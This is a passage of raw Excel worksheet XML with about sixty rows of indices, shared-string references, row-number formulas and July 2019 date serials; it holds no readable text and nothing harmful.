    </row>
    <row r="11940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11940">
        <f t="shared" si="186"/>
        <v>11939</v>
      </c>
      <c r="B11940">
        <v>1939</v>
      </c>
      <c r="C11940" t="s">
        <v>19637</v>
      </c>
      <c r="D11940" s="1">
        <v>43668</v>
      </c>
      <c r="E11940" t="s">
        <v>22055</v>
      </c>
      <c r="F11940" t="s">
        <v>10526</v>
      </c>
      <c r="G11940" t="s">
        <v>22056</v>
      </c>
    </row>
    <row r="11941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11941">
        <f t="shared" si="186"/>
        <v>11940</v>
      </c>
      <c r="B11941">
        <v>1940</v>
      </c>
      <c r="C11941" t="s">
        <v>19637</v>
      </c>
      <c r="D11941" s="1">
        <v>43671</v>
      </c>
      <c r="E11941" t="s">
        <v>19640</v>
      </c>
      <c r="F11941" t="s">
        <v>10021</v>
      </c>
      <c r="G11941" t="s">
        <v>22057</v>
      </c>
    </row>
    <row r="11942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11942">
        <f t="shared" si="186"/>
        <v>11941</v>
      </c>
      <c r="B11942">
        <v>1941</v>
      </c>
      <c r="C11942" t="s">
        <v>19637</v>
      </c>
      <c r="D11942" s="1">
        <v>43672</v>
      </c>
      <c r="E11942" t="s">
        <v>19650</v>
      </c>
      <c r="F11942" t="s">
        <v>10021</v>
      </c>
      <c r="G11942" t="s">
        <v>22058</v>
      </c>
    </row>
    <row r="11943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11943">
        <f t="shared" si="186"/>
        <v>11942</v>
      </c>
      <c r="B11943">
        <v>1942</v>
      </c>
      <c r="C11943" t="s">
        <v>19637</v>
      </c>
      <c r="D11943" s="1">
        <v>43676</v>
      </c>
      <c r="E11943" t="s">
        <v>21312</v>
      </c>
      <c r="F11943" t="s">
        <v>10021</v>
      </c>
      <c r="G11943" t="s">
        <v>22059</v>
      </c>
    </row>
    <row r="11944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11944">
        <f t="shared" si="186"/>
        <v>11943</v>
      </c>
      <c r="B11944">
        <v>1943</v>
      </c>
      <c r="C11944" t="s">
        <v>19637</v>
      </c>
      <c r="D11944" s="1">
        <v>43673</v>
      </c>
      <c r="E11944" t="s">
        <v>19701</v>
      </c>
      <c r="F11944" t="s">
        <v>10021</v>
      </c>
      <c r="G11944" t="s">
        <v>22060</v>
      </c>
    </row>
    <row r="11945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11945">
        <f t="shared" si="186"/>
        <v>11944</v>
      </c>
      <c r="B11945">
        <v>1944</v>
      </c>
      <c r="C11945" t="s">
        <v>19637</v>
      </c>
      <c r="D11945" s="1">
        <v>43670</v>
      </c>
      <c r="E11945" t="s">
        <v>19725</v>
      </c>
      <c r="F11945" t="s">
        <v>9978</v>
      </c>
      <c r="G11945" t="s">
        <v>22061</v>
      </c>
    </row>
    <row r="11946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11946">
        <f t="shared" si="186"/>
        <v>11945</v>
      </c>
      <c r="B11946">
        <v>1945</v>
      </c>
      <c r="C11946" t="s">
        <v>19637</v>
      </c>
      <c r="D11946" s="1">
        <v>43671</v>
      </c>
      <c r="E11946" t="s">
        <v>19717</v>
      </c>
      <c r="F11946" t="s">
        <v>10526</v>
      </c>
      <c r="G11946" t="s">
        <v>22062</v>
      </c>
    </row>
    <row r="11947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11947">
        <f t="shared" si="186"/>
        <v>11946</v>
      </c>
      <c r="B11947">
        <v>1946</v>
      </c>
      <c r="C11947" t="s">
        <v>19637</v>
      </c>
      <c r="D11947" s="1">
        <v>43677</v>
      </c>
      <c r="E11947" t="s">
        <v>21630</v>
      </c>
      <c r="F11947" t="s">
        <v>10526</v>
      </c>
      <c r="G11947" t="s">
        <v>22063</v>
      </c>
    </row>
    <row r="11948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11948">
        <f t="shared" si="186"/>
        <v>11947</v>
      </c>
      <c r="B11948">
        <v>1947</v>
      </c>
      <c r="C11948" t="s">
        <v>19637</v>
      </c>
      <c r="D11948" s="1">
        <v>43674</v>
      </c>
      <c r="E11948" t="s">
        <v>19650</v>
      </c>
      <c r="F11948" t="s">
        <v>10021</v>
      </c>
      <c r="G11948" t="s">
        <v>22064</v>
      </c>
    </row>
    <row r="11949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11949">
        <f t="shared" si="186"/>
        <v>11948</v>
      </c>
      <c r="B11949">
        <v>1948</v>
      </c>
      <c r="C11949" t="s">
        <v>19637</v>
      </c>
      <c r="D11949" s="1">
        <v>43672</v>
      </c>
      <c r="E11949" t="s">
        <v>19796</v>
      </c>
      <c r="F11949" t="s">
        <v>10021</v>
      </c>
      <c r="G11949" t="s">
        <v>22065</v>
      </c>
    </row>
    <row r="11950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11950">
        <f t="shared" si="186"/>
        <v>11949</v>
      </c>
      <c r="B11950">
        <v>1949</v>
      </c>
      <c r="C11950" t="s">
        <v>19637</v>
      </c>
      <c r="D11950" s="1">
        <v>43674</v>
      </c>
      <c r="F11950" t="s">
        <v>10526</v>
      </c>
      <c r="G11950" t="s">
        <v>22066</v>
      </c>
    </row>
    <row r="11951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11951">
        <f t="shared" si="186"/>
        <v>11950</v>
      </c>
      <c r="B11951">
        <v>1950</v>
      </c>
      <c r="C11951" t="s">
        <v>19637</v>
      </c>
      <c r="D11951" s="1">
        <v>43670</v>
      </c>
      <c r="E11951" t="s">
        <v>20464</v>
      </c>
      <c r="F11951" t="s">
        <v>10526</v>
      </c>
      <c r="G11951" t="s">
        <v>22067</v>
      </c>
    </row>
    <row r="11952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11952">
        <f t="shared" si="186"/>
        <v>11951</v>
      </c>
      <c r="B11952">
        <v>1951</v>
      </c>
      <c r="C11952" t="s">
        <v>19637</v>
      </c>
      <c r="D11952" s="1">
        <v>43670</v>
      </c>
      <c r="E11952" t="s">
        <v>19640</v>
      </c>
      <c r="F11952" t="s">
        <v>9975</v>
      </c>
      <c r="G11952" t="s">
        <v>22068</v>
      </c>
    </row>
    <row r="11953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11953">
        <f t="shared" si="186"/>
        <v>11952</v>
      </c>
      <c r="B11953">
        <v>1952</v>
      </c>
      <c r="C11953" t="s">
        <v>19637</v>
      </c>
      <c r="D11953" s="1">
        <v>43670</v>
      </c>
      <c r="E11953" t="s">
        <v>19640</v>
      </c>
      <c r="F11953" t="s">
        <v>9975</v>
      </c>
      <c r="G11953" t="s">
        <v>22069</v>
      </c>
    </row>
    <row r="11954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11954">
        <f t="shared" si="186"/>
        <v>11953</v>
      </c>
      <c r="B11954">
        <v>1953</v>
      </c>
      <c r="C11954" t="s">
        <v>19637</v>
      </c>
      <c r="D11954" s="1">
        <v>43675</v>
      </c>
      <c r="E11954" t="s">
        <v>20873</v>
      </c>
      <c r="F11954" t="s">
        <v>10526</v>
      </c>
      <c r="G11954" t="s">
        <v>22070</v>
      </c>
    </row>
    <row r="11955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11955">
        <f t="shared" si="186"/>
        <v>11954</v>
      </c>
      <c r="B11955">
        <v>1954</v>
      </c>
      <c r="C11955" t="s">
        <v>19637</v>
      </c>
      <c r="D11955" s="1">
        <v>43673</v>
      </c>
      <c r="E11955" t="s">
        <v>19849</v>
      </c>
      <c r="F11955" t="s">
        <v>10021</v>
      </c>
      <c r="G11955" t="s">
        <v>22071</v>
      </c>
    </row>
    <row r="11956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11956">
        <f t="shared" si="186"/>
        <v>11955</v>
      </c>
      <c r="B11956">
        <v>1955</v>
      </c>
      <c r="C11956" t="s">
        <v>19637</v>
      </c>
      <c r="D11956" s="1">
        <v>43670</v>
      </c>
      <c r="F11956" t="s">
        <v>10526</v>
      </c>
      <c r="G11956" t="s">
        <v>22072</v>
      </c>
    </row>
    <row r="11957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11957">
        <f t="shared" si="186"/>
        <v>11956</v>
      </c>
      <c r="B11957">
        <v>1956</v>
      </c>
      <c r="C11957" t="s">
        <v>19637</v>
      </c>
      <c r="D11957" s="1">
        <v>43677</v>
      </c>
      <c r="E11957" t="s">
        <v>19640</v>
      </c>
      <c r="F11957" t="s">
        <v>10021</v>
      </c>
      <c r="G11957" t="s">
        <v>22073</v>
      </c>
    </row>
    <row r="11958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11958">
        <f t="shared" si="186"/>
        <v>11957</v>
      </c>
      <c r="B11958">
        <v>1957</v>
      </c>
      <c r="C11958" t="s">
        <v>19637</v>
      </c>
      <c r="D11958" s="1">
        <v>43674</v>
      </c>
      <c r="E11958" t="s">
        <v>19750</v>
      </c>
      <c r="F11958" t="s">
        <v>9978</v>
      </c>
      <c r="G11958" t="s">
        <v>22074</v>
      </c>
    </row>
    <row r="11959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11959">
        <f t="shared" si="186"/>
        <v>11958</v>
      </c>
      <c r="B11959">
        <v>1958</v>
      </c>
      <c r="C11959" t="s">
        <v>19637</v>
      </c>
      <c r="D11959" s="1">
        <v>43671</v>
      </c>
      <c r="F11959" t="s">
        <v>10526</v>
      </c>
      <c r="G11959" t="s">
        <v>22075</v>
      </c>
    </row>
    <row r="11960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11960">
        <f t="shared" si="186"/>
        <v>11959</v>
      </c>
      <c r="B11960">
        <v>1959</v>
      </c>
      <c r="C11960" t="s">
        <v>19637</v>
      </c>
      <c r="D11960" s="1">
        <v>43668</v>
      </c>
      <c r="F11960" t="s">
        <v>10526</v>
      </c>
      <c r="G11960" t="s">
        <v>22076</v>
      </c>
    </row>
    <row r="11961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11961">
        <f t="shared" si="186"/>
        <v>11960</v>
      </c>
      <c r="B11961">
        <v>1960</v>
      </c>
      <c r="C11961" t="s">
        <v>19637</v>
      </c>
      <c r="D11961" s="1">
        <v>43677</v>
      </c>
      <c r="E11961" t="s">
        <v>19643</v>
      </c>
      <c r="F11961" t="s">
        <v>10021</v>
      </c>
      <c r="G11961" t="s">
        <v>22077</v>
      </c>
    </row>
    <row r="11962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11962">
        <f t="shared" si="186"/>
        <v>11961</v>
      </c>
      <c r="B11962">
        <v>1961</v>
      </c>
      <c r="C11962" t="s">
        <v>19637</v>
      </c>
      <c r="D11962" s="1">
        <v>43671</v>
      </c>
      <c r="E11962" t="s">
        <v>19695</v>
      </c>
      <c r="F11962" t="s">
        <v>9975</v>
      </c>
      <c r="G11962" t="s">
        <v>22078</v>
      </c>
    </row>
    <row r="11963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11963">
        <f t="shared" si="186"/>
        <v>11962</v>
      </c>
      <c r="B11963">
        <v>1962</v>
      </c>
      <c r="C11963" t="s">
        <v>19637</v>
      </c>
      <c r="D11963" s="1">
        <v>43669</v>
      </c>
      <c r="E11963" t="s">
        <v>20005</v>
      </c>
      <c r="F11963" t="s">
        <v>9975</v>
      </c>
      <c r="G11963" t="s">
        <v>22079</v>
      </c>
    </row>
    <row r="11964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11964">
        <f t="shared" si="186"/>
        <v>11963</v>
      </c>
      <c r="B11964">
        <v>1963</v>
      </c>
      <c r="C11964" t="s">
        <v>19637</v>
      </c>
      <c r="D11964" s="1">
        <v>43676</v>
      </c>
      <c r="E11964" t="s">
        <v>20220</v>
      </c>
      <c r="F11964" t="s">
        <v>10021</v>
      </c>
      <c r="G11964" t="s">
        <v>22080</v>
      </c>
    </row>
    <row r="11965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11965">
        <f t="shared" si="186"/>
        <v>11964</v>
      </c>
      <c r="B11965">
        <v>1964</v>
      </c>
      <c r="C11965" t="s">
        <v>19637</v>
      </c>
      <c r="D11965" s="1">
        <v>43674</v>
      </c>
      <c r="E11965" t="s">
        <v>19640</v>
      </c>
      <c r="F11965" t="s">
        <v>10021</v>
      </c>
      <c r="G11965" t="s">
        <v>22081</v>
      </c>
    </row>
    <row r="11966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11966">
        <f t="shared" si="186"/>
        <v>11965</v>
      </c>
      <c r="B11966">
        <v>1965</v>
      </c>
      <c r="C11966" t="s">
        <v>19637</v>
      </c>
      <c r="D11966" s="1">
        <v>43670</v>
      </c>
      <c r="E11966" t="s">
        <v>19650</v>
      </c>
      <c r="F11966" t="s">
        <v>10021</v>
      </c>
      <c r="G11966" t="s">
        <v>22082</v>
      </c>
    </row>
    <row r="11967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11967">
        <f t="shared" si="186"/>
        <v>11966</v>
      </c>
      <c r="B11967">
        <v>1966</v>
      </c>
      <c r="C11967" t="s">
        <v>19637</v>
      </c>
      <c r="D11967" s="1">
        <v>43675</v>
      </c>
      <c r="E11967" t="s">
        <v>22083</v>
      </c>
      <c r="F11967" t="s">
        <v>9975</v>
      </c>
      <c r="G11967" t="s">
        <v>22084</v>
      </c>
    </row>
    <row r="11968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11968">
        <f t="shared" si="186"/>
        <v>11967</v>
      </c>
      <c r="B11968">
        <v>1967</v>
      </c>
      <c r="C11968" t="s">
        <v>19637</v>
      </c>
      <c r="D11968" s="1">
        <v>43676</v>
      </c>
      <c r="E11968" t="s">
        <v>19810</v>
      </c>
      <c r="F11968" t="s">
        <v>10526</v>
      </c>
      <c r="G11968" t="s">
        <v>22085</v>
      </c>
    </row>
    <row r="11969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11969">
        <f t="shared" si="186"/>
        <v>11968</v>
      </c>
      <c r="B11969">
        <v>1968</v>
      </c>
      <c r="C11969" t="s">
        <v>19637</v>
      </c>
      <c r="D11969" s="1">
        <v>43671</v>
      </c>
      <c r="E11969" t="s">
        <v>19840</v>
      </c>
      <c r="F11969" t="s">
        <v>10021</v>
      </c>
      <c r="G11969" t="s">
        <v>22086</v>
      </c>
    </row>
    <row r="11970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11970">
        <f t="shared" si="186"/>
        <v>11969</v>
      </c>
      <c r="B11970">
        <v>1969</v>
      </c>
      <c r="C11970" t="s">
        <v>19637</v>
      </c>
      <c r="D11970" s="1">
        <v>43674</v>
      </c>
      <c r="F11970" t="s">
        <v>10021</v>
      </c>
      <c r="G11970" t="s">
        <v>22087</v>
      </c>
    </row>
    <row r="11971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11971">
        <f t="shared" ref="A11971:A12034" si="187">+ROW(A11970)</f>
        <v>11970</v>
      </c>
      <c r="B11971">
        <v>1970</v>
      </c>
      <c r="C11971" t="s">
        <v>19637</v>
      </c>
      <c r="D11971" s="1">
        <v>43669</v>
      </c>
      <c r="E11971" t="s">
        <v>20167</v>
      </c>
      <c r="F11971" t="s">
        <v>10526</v>
      </c>
      <c r="G11971" t="s">
        <v>22088</v>
      </c>
    </row>
    <row r="11972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11972">
        <f t="shared" si="187"/>
        <v>11971</v>
      </c>
      <c r="B11972">
        <v>1971</v>
      </c>
      <c r="C11972" t="s">
        <v>19637</v>
      </c>
      <c r="D11972" s="1">
        <v>43677</v>
      </c>
      <c r="E11972" t="s">
        <v>19640</v>
      </c>
      <c r="F11972" t="s">
        <v>9975</v>
      </c>
      <c r="G11972" t="s">
        <v>22089</v>
      </c>
    </row>
    <row r="11973" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11973">
        <f t="shared" si="187"/>
        <v>11972</v>
      </c>
      <c r="B11973">
        <v>1972</v>
      </c>
      <c r="C11973" t="s">
        <v>19637</v>
      </c>
      <c r="D11973" s="1">
        <v>43670</v>
      </c>
      <c r="E11973" t="s">
        <v>22090</v>
      </c>
      <c r="F11973" t="s">
        <v>9978</v>
      </c>
      <c r="G11973" t="s">
        <v>22091</v>
      </c>
    </row>
    <row r="11974" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11974">
        <f t="shared" si="187"/>
        <v>11973</v>
      </c>
      <c r="B11974">
        <v>1973</v>
      </c>
      <c r="C11974" t="s">
        <v>19637</v>
      </c>
      <c r="D11974" s="1">
        <v>43670</v>
      </c>
      <c r="E11974" t="s">
        <v>19840</v>
      </c>
      <c r="F11974" t="s">
        <v>10021</v>
      </c>
      <c r="G11974" t="s">
        <v>22092</v>
      </c>
    </row>
    <row r="11975" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11975">
        <f t="shared" si="187"/>
        <v>11974</v>
      </c>
      <c r="B11975">
        <v>1974</v>
      </c>
      <c r="C11975" t="s">
        <v>19637</v>
      </c>
      <c r="D11975" s="1">
        <v>43668</v>
      </c>
      <c r="F11975" t="s">
        <v>10526</v>
      </c>
      <c r="G11975" t="s">
        <v>22093</v>
      </c>
    </row>
    <row r="11976" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11976">
        <f t="shared" si="187"/>
        <v>11975</v>
      </c>
      <c r="B11976">
        <v>1975</v>
      </c>
      <c r="C11976" t="s">
        <v>19637</v>
      </c>
      <c r="D11976" s="1">
        <v>43676</v>
      </c>
      <c r="E11976" t="s">
        <v>21710</v>
      </c>
      <c r="F11976" t="s">
        <v>9978</v>
      </c>
      <c r="G11976" t="s">
        <v>22094</v>
      </c>
    </row>
    <row r="11977" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11977">
        <f t="shared" si="187"/>
        <v>11976</v>
      </c>
      <c r="B11977">
        <v>1976</v>
      </c>
      <c r="C11977" t="s">
        <v>19637</v>
      </c>
      <c r="D11977" s="1">
        <v>43670</v>
      </c>
      <c r="E11977" t="s">
        <v>19840</v>
      </c>
      <c r="F11977" t="s">
        <v>10021</v>
      </c>
      <c r="G11977" t="s">
        <v>22095</v>
      </c>
    </row>
    <row r="11978" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11978">
        <f t="shared" si="187"/>
        <v>11977</v>
      </c>
      <c r="B11978">
        <v>1977</v>
      </c>
      <c r="C11978" t="s">
        <v>19637</v>
      </c>
      <c r="D11978" s="1">
        <v>43672</v>
      </c>
      <c r="E11978" t="s">
        <v>21544</v>
      </c>
      <c r="F11978" t="s">
        <v>10526</v>
      </c>
      <c r="G11978" t="s">
        <v>22096</v>
      </c>
    </row>
    <row r="11979" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11979">
        <f t="shared" si="187"/>
        <v>11978</v>
      </c>
      <c r="B11979">
        <v>1978</v>
      </c>
      <c r="C11979" t="s">
        <v>19637</v>
      </c>
      <c r="D11979" s="1">
        <v>43673</v>
      </c>
      <c r="E11979" t="s">
        <v>20185</v>
      </c>
      <c r="F11979" t="s">
        <v>9975</v>
      </c>
      <c r="G11979" t="s">
        <v>22097</v>
      </c>
    </row>
    <row r="11980" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11980">
        <f t="shared" si="187"/>
        <v>11979</v>
      </c>
      <c r="B11980">
        <v>1979</v>
      </c>
      <c r="C11980" t="s">
        <v>19637</v>
      </c>
      <c r="D11980" s="1">
        <v>43671</v>
      </c>
      <c r="E11980" t="s">
        <v>20811</v>
      </c>
      <c r="F11980" t="s">
        <v>10021</v>
      </c>
      <c r="G11980" t="s">
        <v>22098</v>
      </c>
    </row>
    <row r="11981" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11981">
        <f t="shared" si="187"/>
        <v>11980</v>
      </c>
      <c r="B11981">
        <v>1980</v>
      </c>
      <c r="C11981" t="s">
        <v>19637</v>
      </c>
      <c r="D11981" s="1">
        <v>43669</v>
      </c>
      <c r="F11981" t="s">
        <v>10526</v>
      </c>
      <c r="G11981" t="s">
        <v>22099</v>
      </c>
    </row>
    <row r="11982" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11982">
        <f t="shared" si="187"/>
        <v>11981</v>
      </c>
      <c r="B11982">
        <v>1981</v>
      </c>
      <c r="C11982" t="s">
        <v>19637</v>
      </c>
      <c r="D11982" s="1">
        <v>43670</v>
      </c>
      <c r="E11982" t="s">
        <v>19638</v>
      </c>
      <c r="F11982" t="s">
        <v>10021</v>
      </c>
      <c r="G11982" t="s">
        <v>22100</v>
      </c>
    </row>
    <row r="11983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11983">
        <f t="shared" si="187"/>
        <v>11982</v>
      </c>
      <c r="B11983">
        <v>1982</v>
      </c>
      <c r="C11983" t="s">
        <v>19637</v>
      </c>
      <c r="D11983" s="1">
        <v>43676</v>
      </c>
      <c r="E11983" t="s">
        <v>19640</v>
      </c>
      <c r="F11983" t="s">
        <v>9975</v>
      </c>
      <c r="G11983" t="s">
        <v>22101</v>
      </c>
    </row>
    <row r="11984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11984">
        <f t="shared" si="187"/>
        <v>11983</v>
      </c>
      <c r="B11984">
        <v>1983</v>
      </c>
      <c r="C11984" t="s">
        <v>19637</v>
      </c>
      <c r="D11984" s="1">
        <v>43672</v>
      </c>
      <c r="F11984" t="s">
        <v>10021</v>
      </c>
      <c r="G11984" t="s">
        <v>22102</v>
      </c>
    </row>
    <row r="11985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11985">
        <f t="shared" si="187"/>
        <v>11984</v>
      </c>
      <c r="B11985">
        <v>1984</v>
      </c>
      <c r="C11985" t="s">
        <v>19637</v>
      </c>
      <c r="D11985" s="1">
        <v>43675</v>
      </c>
      <c r="E11985" t="s">
        <v>19672</v>
      </c>
      <c r="F11985" t="s">
        <v>10021</v>
      </c>
      <c r="G11985" t="s">
        <v>22103</v>
      </c>
    </row>
    <row r="11986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11986">
        <f t="shared" si="187"/>
        <v>11985</v>
      </c>
      <c r="B11986">
        <v>1985</v>
      </c>
      <c r="C11986" t="s">
        <v>19637</v>
      </c>
      <c r="D11986" s="1">
        <v>43673</v>
      </c>
      <c r="E11986" t="s">
        <v>19648</v>
      </c>
      <c r="F11986" t="s">
        <v>10021</v>
      </c>
      <c r="G11986" t="s">
        <v>22104</v>
      </c>
    </row>
    <row r="11987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11987">
        <f t="shared" si="187"/>
        <v>11986</v>
      </c>
      <c r="B11987">
        <v>1986</v>
      </c>
      <c r="C11987" t="s">
        <v>19637</v>
      </c>
      <c r="D11987" s="1">
        <v>43675</v>
      </c>
      <c r="E11987" t="s">
        <v>20672</v>
      </c>
      <c r="F11987" t="s">
        <v>9975</v>
      </c>
      <c r="G11987" t="s">
        <v>22105</v>
      </c>
    </row>
    <row r="11988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11988">
        <f t="shared" si="187"/>
        <v>11987</v>
      </c>
      <c r="B11988">
        <v>1987</v>
      </c>
      <c r="C11988" t="s">
        <v>19637</v>
      </c>
      <c r="D11988" s="1">
        <v>43675</v>
      </c>
      <c r="F11988" t="s">
        <v>9978</v>
      </c>
      <c r="G11988" t="s">
        <v>22106</v>
      </c>
    </row>
    <row r="11989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11989">
        <f t="shared" si="187"/>
        <v>11988</v>
      </c>
      <c r="B11989">
        <v>1988</v>
      </c>
      <c r="C11989" t="s">
        <v>19637</v>
      </c>
      <c r="D11989" s="1">
        <v>43673</v>
      </c>
      <c r="E11989" t="s">
        <v>22107</v>
      </c>
      <c r="F11989" t="s">
        <v>10526</v>
      </c>
      <c r="G11989" t="s">
        <v>22108</v>
      </c>
    </row>
    <row r="11990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11990">
        <f t="shared" si="187"/>
        <v>11989</v>
      </c>
      <c r="B11990">
        <v>1989</v>
      </c>
      <c r="C11990" t="s">
        <v>19637</v>
      </c>
      <c r="D11990" s="1">
        <v>43671</v>
      </c>
      <c r="E11990" t="s">
        <v>20185</v>
      </c>
      <c r="F11990" t="s">
        <v>9975</v>
      </c>
      <c r="G11990" t="s">
        <v>22109</v>
      </c>
    </row>
    <row r="11991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11991">
        <f t="shared" si="187"/>
        <v>11990</v>
      </c>
      <c r="B11991">
        <v>1990</v>
      </c>
      <c r="C11991" t="s">
        <v>19637</v>
      </c>
      <c r="D11991" s="1">
        <v>43669</v>
      </c>
      <c r="E11991" t="s">
        <v>19643</v>
      </c>
      <c r="F11991" t="s">
        <v>10021</v>
      </c>
      <c r="G11991" t="s">
        <v>22110</v>
      </c>
    </row>
    <row r="11992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11992">
        <f t="shared" si="187"/>
        <v>11991</v>
      </c>
      <c r="B11992">
        <v>1991</v>
      </c>
      <c r="C11992" t="s">
        <v>19637</v>
      </c>
      <c r="D11992" s="1">
        <v>43668</v>
      </c>
      <c r="E11992" t="s">
        <v>20871</v>
      </c>
      <c r="F11992" t="s">
        <v>9978</v>
      </c>
      <c r="G11992" t="s">
        <v>22111</v>
      </c>
    </row>
    <row r="11993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11993">
        <f t="shared" si="187"/>
        <v>11992</v>
      </c>
      <c r="B11993">
        <v>1992</v>
      </c>
      <c r="C11993" t="s">
        <v>19637</v>
      </c>
      <c r="D11993" s="1">
        <v>43672</v>
      </c>
      <c r="F11993" t="s">
        <v>10526</v>
      </c>
      <c r="G11993" t="s">
        <v>22112</v>
      </c>
    </row>
    <row r="11994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11994">
        <f t="shared" si="187"/>
        <v>11993</v>
      </c>
      <c r="B11994">
        <v>1993</v>
      </c>
      <c r="C11994" t="s">
        <v>19637</v>
      </c>
      <c r="D11994" s="1">
        <v>43671</v>
      </c>
      <c r="E11994" t="s">
        <v>19648</v>
      </c>
      <c r="F11994" t="s">
        <v>10021</v>
      </c>
      <c r="G11994" t="s">
        <v>22113</v>
      </c>
    </row>
    <row r="11995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11995">
        <f t="shared" si="187"/>
        <v>11994</v>
      </c>
      <c r="B11995">
        <v>1994</v>
      </c>
      <c r="C11995" t="s">
        <v>19637</v>
      </c>
      <c r="D11995" s="1">
        <v>43669</v>
      </c>
      <c r="F11995" t="s">
        <v>10526</v>
      </c>
      <c r="G11995" t="s">
        <v>22114</v>
      </c>
    </row>
    <row r="11996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11996">
        <f t="shared" si="187"/>
        <v>11995</v>
      </c>
      <c r="B11996">
        <v>1995</v>
      </c>
      <c r="C11996" t="s">
        <v>19637</v>
      </c>
      <c r="D11996" s="1">
        <v>43674</v>
      </c>
      <c r="E11996" t="s">
        <v>19648</v>
      </c>
      <c r="F11996" t="s">
        <v>10021</v>
      </c>
      <c r="G11996" t="s">
        <v>22115</v>
      </c>
    </row>
    <row r="11997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11997">
        <f t="shared" si="187"/>
        <v>11996</v>
      </c>
      <c r="B11997">
        <v>1996</v>
      </c>
      <c r="C11997" t="s">
        <v>19637</v>
      </c>
      <c r="D11997" s="1">
        <v>43676</v>
      </c>
      <c r="E11997" t="s">
        <v>21130</v>
      </c>
      <c r="F11997" t="s">
        <v>10526</v>
      </c>
      <c r="G11997" t="s">
        <v>22116</v>
      </c>
    </row>
    <row r="11998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11998">
        <f t="shared" si="187"/>
        <v>11997</v>
      </c>
      <c r="B11998">
        <v>1997</v>
      </c>
      <c r="C11998" t="s">
        <v>19637</v>
      </c>
      <c r="D11998" s="1">
        <v>43672</v>
      </c>
      <c r="E11998" t="s">
        <v>22117</v>
      </c>
      <c r="F11998" t="s">
        <v>10526</v>
      </c>
      <c r="G11998" t="s">
        <v>22118</v>
      </c>
    </row>
    <row r="11999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A11999">
        <f t="shared" si="187"/>
        <v>11998</v>
      </c>
      <c r="B11999">
        <v>1998</v>
      </c>
      <c r="C11999" t="s">
        <v>19637</v>
      </c>
      <c r="D11999" s="1">
        <v>43676</v>
      </c>
      <c r="E11999" t="s">
        <v>19796</v>
      </c>
      <c r="F11999" t="s">
        <v>10021</v>
      </c>
      <c r="G11999" t="s">
        <v>22119</v>
      </c>
    </row>
    <row r="12000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12000">
        <f t="shared" si="187"/>
        <v>11999</v>
      </c>
      <c r="B12000">
        <v>1999</v>
      </c>
      <c r="C12000" t="s">
        <v>19637</v>
      </c>
      <c r="D12000" s="1">
        <v>43670</v>
      </c>
      <c r="E12000" t="s">
        <v>22120</v>
      </c>
      <c r="F12000" t="s">
        <v>10526</v>
      </c>
      <c r="G12000" t="s">
        <v>22121</v>
      </c>
    </row>
    <row r="12001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12001">
        <f t="shared" si="187"/>
        <v>12000</v>
      </c>
      <c r="B12001">
        <v>2000</v>
      </c>
      <c r="C12001" t="s">
        <v>19637</v>
      </c>
      <c r="D12001" s="1">
        <v>43676</v>
      </c>
      <c r="F12001" t="s">
        <v>10526</v>
      </c>
      <c r="G12001" t="s">
        <v>22122</v>
      </c>
    </row>
    <row r="12002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A12002">
        <f t="shared" si="187"/>
        <v>12001</v>
